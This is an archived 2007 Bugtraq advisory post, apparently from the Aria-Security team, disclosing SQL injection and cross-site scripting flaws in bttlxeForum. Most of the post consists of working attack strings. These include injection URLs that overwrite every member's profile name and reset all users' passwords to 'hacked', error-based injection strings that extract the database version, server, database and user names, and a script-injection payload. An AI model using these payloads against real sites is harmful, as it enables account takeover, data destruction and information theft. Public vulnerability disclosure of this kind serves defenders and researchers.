lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 9 Dec 2007 01:01:31 -0000
From: noreply@...a-security.net
To: bugtraq@...urityfocus.com
Subject: bttlxeForum Multiple SQL Injection And Cross Site Scripting

Aria-Security Team
http://Aria-Security.Net
-----------------------------
Discovered By: Mormoroth
Shout outs The-0utlaw for completing the vuln.

I.SQL Injection

http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
This Changes MemberList...

http://site.ltd/myaccount/viewProfile.asp?member='update Members set Password='hacked';--
changes all the users' password to hacked

myaccount/psswd.asp
has the same problem 

a' or 1=convert(int,@@version)--
a' or 1=convert(int,@@servername)--
a' or 1=convert(int,db_name())--
a' or 1=convert(int,user_name())--
a' or 1=convert(int,system_user)

Might be useful.


II.Cross Site SCripting:
failure.asp?err_txt="><script>alert('Aria-Security.Net')</script>


Adivsory @ http://aria-security.net/forum/forumdisplay.php?f=60
Credits Goes To Aria-Security Team

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ